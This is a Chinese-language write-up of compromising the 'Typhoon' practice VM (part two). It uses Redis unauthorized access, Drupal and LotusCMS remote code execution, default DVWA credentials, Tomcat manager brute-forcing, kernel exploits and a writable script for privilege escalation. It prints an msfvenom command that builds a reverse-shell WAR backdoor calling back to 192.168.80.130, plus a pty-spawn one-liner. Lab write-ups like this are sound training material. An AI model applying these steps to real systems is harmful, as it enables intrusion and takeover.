typhoon靶机渗透( 二 ) _typhoon

文章插图

6379端口这个端口是redis ，测试一下是否存在未授权访问确实存在

文章插图

Redis利用方式有三种
1.Redis写webshell2.Redis写计划任务反弹shell3.Redis写ssh公钥详细见我之前写的一篇Redis利用方式总结：
https://www.ghtwf01.cn/index.php/archives/407/
80端口drupal Drupalgeddon 2远程代码执行(CVE-2018-7600)目录扫描发现了它，直接上msf

文章插图

LotusCMS 远程代码执行在cms目录，同样msf

文章插图

dvwa账号密码是默认的admin/password这里面全是洞，直接命令执行弹shell
phpmyadmin利用dvwa里面的文件包含漏洞或获取dvwa配置文件信息拿到数据库账号密码登录
8080端口发现是Tomcat ，先目录扫描一下，找到后台manager ，需要账号密码使用msf爆破一下

文章插图

账号密码都为tomcat进入后台发现版本号7.0.52 ，有上传点，所以就是部署war后门
手动使用msf生成war包后门
msfvenom -p linux/x86/shell_reverse_tcp lhost=192.168.80.130 lport=4444 -f war -o shell.war

文章插图

打开发现后门名叫hmmliavgsqxlddq.jsp上传shell.war访问shell/hmmliavgsqxlddq.jsp反弹shell

文章插图

自动msf一把梭

文章插图

权限提升这里演示几种提权方式
内核提权uname -a查看内核版本

文章插图

搜索一下，发现存在内核提权

文章插图

然后上传exp ，编译运行

文章插图

配置不当提权先切换成bash
Python -c 'import pty;pty.spawn("/bin/bash")'发现在tab目录下有一个script.sh文件所有用户都可以操作，于是在里面写入反弹shell命令，但是反弹过来的不是root权限，而且返回来的shell还挺难操作，有点迷